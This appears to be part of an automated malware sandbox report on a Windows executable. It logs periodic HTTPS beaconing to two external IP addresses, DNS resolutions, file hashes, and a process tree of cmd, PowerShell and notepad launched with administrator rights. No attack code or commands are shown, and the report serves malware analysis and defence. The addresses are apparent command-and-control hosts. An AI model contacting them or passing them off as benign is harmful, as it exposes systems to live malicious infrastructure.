Jan 12, 2025 14:19:44.687258959 CET | 443 | 49743 | 80.240.16.67 | 192.168.2.4 |
Jan 12, 2025 14:19:49.733779907 CET | 49744 | 443 | 192.168.2.4 | 80.240.16.67 |
Jan 12, 2025 14:19:49.733875990 CET | 443 | 49744 | 80.240.16.67 | 192.168.2.4 |
Jan 12, 2025 14:19:49.734076977 CET | 49744 | 443 | 192.168.2.4 | 80.240.16.67 |
Jan 12, 2025 14:19:49.734226942 CET | 49744 | 443 | 192.168.2.4 | 80.240.16.67 |
Jan 12, 2025 14:19:49.734251976 CET | 443 | 49744 | 80.240.16.67 | 192.168.2.4 |
Jan 12, 2025 14:19:49.734417915 CET | 443 | 49744 | 80.240.16.67 | 192.168.2.4 |
Jan 12, 2025 14:19:54.776551962 CET | 49745 | 443 | 192.168.2.4 | 192.248.189.11 |
Jan 12, 2025 14:19:54.776587009 CET | 443 | 49745 | 192.248.189.11 | 192.168.2.4 |
Jan 12, 2025 14:19:54.776658058 CET | 49745 | 443 | 192.168.2.4 | 192.248.189.11 |
Jan 12, 2025 14:19:54.789866924 CET | 49745 | 443 | 192.168.2.4 | 192.248.189.11 |
Jan 12, 2025 14:19:54.789881945 CET | 443 | 49745 | 192.248.189.11 | 192.168.2.4 |
Jan 12, 2025 14:19:54.790009022 CET | 443 | 49745 | 192.248.189.11 | 192.168.2.4 |
Jan 12, 2025 14:20:00.796072960 CET | 49753 | 443 | 192.168.2.4 | 192.248.189.11 |
Jan 12, 2025 14:20:00.796161890 CET | 443 | 49753 | 192.248.189.11 | 192.168.2.4 |
Jan 12, 2025 14:20:00.796621084 CET | 49753 | 443 | 192.168.2.4 | 192.248.189.11 |
Jan 12, 2025 14:20:00.805141926 CET | 49753 | 443 | 192.168.2.4 | 192.248.189.11 |
Jan 12, 2025 14:20:00.805181980 CET | 443 | 49753 | 192.248.189.11 | 192.168.2.4 |
Jan 12, 2025 14:20:00.805242062 CET | 443 | 49753 | 192.248.189.11 | 192.168.2.4 |
Jan 12, 2025 14:20:05.842875957 CET | 49787 | 443 | 192.168.2.4 | 80.240.16.67 |
Jan 12, 2025 14:20:05.842959881 CET | 443 | 49787 | 80.240.16.67 | 192.168.2.4 |
Jan 12, 2025 14:20:05.843055010 CET | 49787 | 443 | 192.168.2.4 | 80.240.16.67 |
Jan 12, 2025 14:20:05.843153000 CET | 49787 | 443 | 192.168.2.4 | 80.240.16.67 |
Jan 12, 2025 14:20:05.843173981 CET | 443 | 49787 | 80.240.16.67 | 192.168.2.4 |
Jan 12, 2025 14:20:05.843357086 CET | 443 | 49787 | 80.240.16.67 | 192.168.2.4 |
Jan 12, 2025 14:20:10.883552074 CET | 49819 | 443 | 192.168.2.4 | 192.248.189.11 |
Jan 12, 2025 14:20:10.883565903 CET | 443 | 49819 | 192.248.189.11 | 192.168.2.4 |
Jan 12, 2025 14:20:10.883616924 CET | 49819 | 443 | 192.168.2.4 | 192.248.189.11 |
Jan 12, 2025 14:20:10.883702993 CET | 49819 | 443 | 192.168.2.4 | 192.248.189.11 |
Jan 12, 2025 14:20:10.883708954 CET | 443 | 49819 | 192.248.189.11 | 192.168.2.4 |
Jan 12, 2025 14:20:10.883858919 CET | 443 | 49819 | 192.248.189.11 | 192.168.2.4 |
Jan 12, 2025 14:20:15.905391932 CET | 49853 | 443 | 192.168.2.4 | 192.248.189.11 |
Jan 12, 2025 14:20:15.905452967 CET | 443 | 49853 | 192.248.189.11 | 192.168.2.4 |
Jan 12, 2025 14:20:15.905528069 CET | 49853 | 443 | 192.168.2.4 | 192.248.189.11 |
Jan 12, 2025 14:20:15.914099932 CET | 49853 | 443 | 192.168.2.4 | 192.248.189.11 |
Jan 12, 2025 14:20:15.914133072 CET | 443 | 49853 | 192.248.189.11 | 192.168.2.4 |
Jan 12, 2025 14:20:15.914235115 CET | 443 | 49853 | 192.248.189.11 | 192.168.2.4 |
Jan 12, 2025 14:20:20.921058893 CET | 49885 | 443 | 192.168.2.4 | 192.248.189.11 |
Jan 12, 2025 14:20:20.921148062 CET | 443 | 49885 | 192.248.189.11 | 192.168.2.4 |
Jan 12, 2025 14:20:20.921235085 CET | 49885 | 443 | 192.168.2.4 | 192.248.189.11 |
Jan 12, 2025 14:20:20.921322107 CET | 49885 | 443 | 192.168.2.4 | 192.248.189.11 |
Jan 12, 2025 14:20:20.921344042 CET | 443 | 49885 | 192.248.189.11 | 192.168.2.4 |
Jan 12, 2025 14:20:20.921503067 CET | 443 | 49885 | 192.248.189.11 | 192.168.2.4 |
Jan 12, 2025 14:20:25.969124079 CET | 49918 | 443 | 192.168.2.4 | 192.248.189.11 |
Jan 12, 2025 14:20:25.969217062 CET | 443 | 49918 | 192.248.189.11 | 192.168.2.4 |
Jan 12, 2025 14:20:25.969294071 CET | 49918 | 443 | 192.168.2.4 | 192.248.189.11 |
Jan 12, 2025 14:20:25.972429991 CET | 49918 | 443 | 192.168.2.4 | 192.248.189.11 |
Jan 12, 2025 14:20:25.972466946 CET | 443 | 49918 | 192.248.189.11 | 192.168.2.4 |
Jan 12, 2025 14:20:25.972748995 CET | 443 | 49918 | 192.248.189.11 | 192.168.2.4 |
Jan 12, 2025 14:20:30.999187946 CET | 49946 | 443 | 192.168.2.4 | 192.248.189.11 |
Jan 12, 2025 14:20:30.999248981 CET | 443 | 49946 | 192.248.189.11 | 192.168.2.4 |
Jan 12, 2025 14:20:30.999350071 CET | 49946 | 443 | 192.168.2.4 | 192.248.189.11 |
Jan 12, 2025 14:20:31.009056091 CET | 49946 | 443 | 192.168.2.4 | 192.248.189.11 |
Jan 12, 2025 14:20:31.009074926 CET | 443 | 49946 | 192.248.189.11 | 192.168.2.4 |
Jan 12, 2025 14:20:31.009161949 CET | 443 | 49946 | 192.248.189.11 | 192.168.2.4 |
Jan 12, 2025 14:20:36.061723948 CET | 49977 | 443 | 192.168.2.4 | 192.248.189.11 |
Jan 12, 2025 14:20:36.061747074 CET | 443 | 49977 | 192.248.189.11 | 192.168.2.4 |
Jan 12, 2025 14:20:36.061810017 CET | 49977 | 443 | 192.168.2.4 | 192.248.189.11 |
Jan 12, 2025 14:20:36.061894894 CET | 49977 | 443 | 192.168.2.4 | 192.248.189.11 |
Jan 12, 2025 14:20:36.061903000 CET | 443 | 49977 | 192.248.189.11 | 192.168.2.4 |
Jan 12, 2025 14:20:36.061999083 CET | 443 | 49977 | 192.248.189.11 | 192.168.2.4 |
Jan 12, 2025 14:20:41.094238997 CET | 50011 | 443 | 192.168.2.4 | 192.248.189.11 |
Jan 12, 2025 14:20:41.094253063 CET | 443 | 50011 | 192.248.189.11 | 192.168.2.4 |
Jan 12, 2025 14:20:41.094316006 CET | 50011 | 443 | 192.168.2.4 | 192.248.189.11 |
Jan 12, 2025 14:20:41.094440937 CET | 50011 | 443 | 192.168.2.4 | 192.248.189.11 |
Jan 12, 2025 14:20:41.094449997 CET | 443 | 50011 | 192.248.189.11 | 192.168.2.4 |
Jan 12, 2025 14:20:41.094543934 CET | 443 | 50011 | 192.248.189.11 | 192.168.2.4 |
Jan 12, 2025 14:20:46.155685902 CET | 50023 | 443 | 192.168.2.4 | 192.248.189.11 |
Jan 12, 2025 14:20:46.155786037 CET | 443 | 50023 | 192.248.189.11 | 192.168.2.4 |
Jan 12, 2025 14:20:46.155878067 CET | 50023 | 443 | 192.168.2.4 | 192.248.189.11 |
Jan 12, 2025 14:20:46.164726019 CET | 50023 | 443 | 192.168.2.4 | 192.248.189.11 |
Jan 12, 2025 14:20:46.164767981 CET | 443 | 50023 | 192.248.189.11 | 192.168.2.4 |
Jan 12, 2025 14:20:46.164819956 CET | 443 | 50023 | 192.248.189.11 | 192.168.2.4 |
Jan 12, 2025 14:20:51.186750889 CET | 50024 | 443 | 192.168.2.4 | 192.248.189.11 |
Jan 12, 2025 14:20:51.186805010 CET | 443 | 50024 | 192.248.189.11 | 192.168.2.4 |
Jan 12, 2025 14:20:51.186876059 CET | 50024 | 443 | 192.168.2.4 | 192.248.189.11 |
Jan 12, 2025 14:20:51.186965942 CET | 50024 | 443 | 192.168.2.4 | 192.248.189.11 |
Jan 12, 2025 14:20:51.186976910 CET | 443 | 50024 | 192.248.189.11 | 192.168.2.4 |
Jan 12, 2025 14:20:51.187099934 CET | 443 | 50024 | 192.248.189.11 | 192.168.2.4 |
Jan 12, 2025 14:20:56.218153954 CET | 50025 | 443 | 192.168.2.4 | 80.240.16.67 |
Jan 12, 2025 14:20:56.218225002 CET | 443 | 50025 | 80.240.16.67 | 192.168.2.4 |
Jan 12, 2025 14:20:56.218312979 CET | 50025 | 443 | 192.168.2.4 | 80.240.16.67 |
Jan 12, 2025 14:20:56.218415976 CET | 50025 | 443 | 192.168.2.4 | 80.240.16.67 |
Jan 12, 2025 14:20:56.218434095 CET | 443 | 50025 | 80.240.16.67 | 192.168.2.4 |
Jan 12, 2025 14:20:56.218573093 CET | 443 | 50025 | 80.240.16.67 | 192.168.2.4 |
Jan 12, 2025 14:21:01.264909983 CET | 50026 | 443 | 192.168.2.4 | 80.240.16.67 |
Jan 12, 2025 14:21:01.264995098 CET | 443 | 50026 | 80.240.16.67 | 192.168.2.4 |
Jan 12, 2025 14:21:01.265084982 CET | 50026 | 443 | 192.168.2.4 | 80.240.16.67 |
Jan 12, 2025 14:21:01.273346901 CET | 50026 | 443 | 192.168.2.4 | 80.240.16.67 |
Jan 12, 2025 14:21:01.273377895 CET | 443 | 50026 | 80.240.16.67 | 192.168.2.4 |
Jan 12, 2025 14:21:01.273428917 CET | 443 | 50026 | 80.240.16.67 | 192.168.2.4 |
Jan 12, 2025 14:21:06.312091112 CET | 50027 | 443 | 192.168.2.4 | 192.248.189.11 |
Jan 12, 2025 14:21:06.312122107 CET | 443 | 50027 | 192.248.189.11 | 192.168.2.4 |
Jan 12, 2025 14:21:06.312194109 CET | 50027 | 443 | 192.168.2.4 | 192.248.189.11 |
Jan 12, 2025 14:21:06.312285900 CET | 50027 | 443 | 192.168.2.4 | 192.248.189.11 |
Jan 12, 2025 14:21:06.312292099 CET | 443 | 50027 | 192.248.189.11 | 192.168.2.4 |
Jan 12, 2025 14:21:06.312411070 CET | 443 | 50027 | 192.248.189.11 | 192.168.2.4 |
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Jan 12, 2025 14:19:08.414148092 CET | 57699 | 53 | 192.168.2.4 | 1.1.1.1 |
Jan 12, 2025 14:19:08.421493053 CET | 53 | 57699 | 1.1.1.1 | 192.168.2.4 |
Jan 12, 2025 14:20:10.875041008 CET | 51665 | 53 | 192.168.2.4 | 1.1.1.1 |
Jan 12, 2025 14:20:10.882807016 CET | 53 | 51665 | 1.1.1.1 | 192.168.2.4 |
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS |
---|---|---|---|---|---|---|---|---|
Jan 12, 2025 14:19:08.414148092 CET | 192.168.2.4 | 1.1.1.1 | 0x48b9 | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Jan 12, 2025 14:20:10.875041008 CET | 192.168.2.4 | 1.1.1.1 | 0x10c1 | Standard query (0) | A (IP address) | IN (0x0001) | false |
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS |
---|---|---|---|---|---|---|---|---|---|---|
Jan 12, 2025 14:19:08.421493053 CET | 1.1.1.1 | 192.168.2.4 | 0x48b9 | No error (0) | 192.248.189.11 | A (IP address) | IN (0x0001) | false | ||
Jan 12, 2025 14:19:08.421493053 CET | 1.1.1.1 | 192.168.2.4 | 0x48b9 | No error (0) | 80.240.16.67 | A (IP address) | IN (0x0001) | false | ||
Jan 12, 2025 14:20:10.882807016 CET | 1.1.1.1 | 192.168.2.4 | 0x10c1 | No error (0) | 80.240.16.67 | A (IP address) | IN (0x0001) | false | ||
Jan 12, 2025 14:20:10.882807016 CET | 1.1.1.1 | 192.168.2.4 | 0x10c1 | No error (0) | 192.248.189.11 | A (IP address) | IN (0x0001) | false |
Click to jump to process
Click to jump to process
back
Click to dive into process behavior distribution
Click to jump to process
Target ID: | 0 |
Start time: | 08:19:02 |
Start date: | 12/01/2025 |
Path: | C:\Users\user\Desktop\9d2h99wrj.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x400000 |
File size: | 31'161'344 bytes |
MD5 hash: | 88848246CE109235A762FCD193210CAA |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Yara matches: |
|
Reputation: | low |
Has exited: | true |
Target ID: | 1 |
Start time: | 08:19:02 |
Start date: | 12/01/2025 |
Path: | C:\Windows\System32\conhost.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff7699e0000 |
File size: | 862'208 bytes |
MD5 hash: | 0D698AF330FD17BEE3BF90011D49251D |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Yara matches: |
|
Reputation: | high |
Has exited: | true |
Target ID: | 2 |
Start time: | 08:19:04 |
Start date: | 12/01/2025 |
Path: | C:\Windows\System32\cmd.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff6fc9a0000 |
File size: | 289'792 bytes |
MD5 hash: | 8A2122E8162DBEF04694B9C3E0B6CDEE |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 3 |
Start time: | 08:19:04 |
Start date: | 12/01/2025 |
Path: | C:\Windows\System32\conhost.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff7699e0000 |
File size: | 862'208 bytes |
MD5 hash: | 0D698AF330FD17BEE3BF90011D49251D |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 4 |
Start time: | 08:19:04 |
Start date: | 12/01/2025 |
Path: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff788560000 |
File size: | 452'608 bytes |
MD5 hash: | 04029E121A0CFA5991749937DD22A1D9 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 5 |
Start time: | 08:19:05 |
Start date: | 12/01/2025 |
Path: | C:\Windows\System32\notepad.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff7c9fc0000 |
File size: | 201'216 bytes |
MD5 hash: | 27F71B12CB585541885A31BE22F61C83 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Yara matches: |
|
Reputation: | moderate |
Has exited: | false |
Target ID: | 7 |
Start time: | 08:19:07 |
Start date: | 12/01/2025 |
Path: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff788560000 |
File size: | 452'608 bytes |
MD5 hash: | 04029E121A0CFA5991749937DD22A1D9 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Execution Graph
Execution Coverage
Dynamic/Packed Code Coverage
Signature Coverage
Execution Coverage: | 56.8% |
Dynamic/Decrypted Code Coverage: | 0% |
Signature Coverage: | 0% |
Total number of Nodes: | 12 |
Total number of Limit Nodes: | 0 |
Graph
Callgraph
Control-flow Graph
APIs |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Control-flow Graph
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Control-flow Graph
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Control-flow Graph
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Control-flow Graph
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Control-flow Graph
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Control-flow Graph
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Control-flow Graph
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Control-flow Graph
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|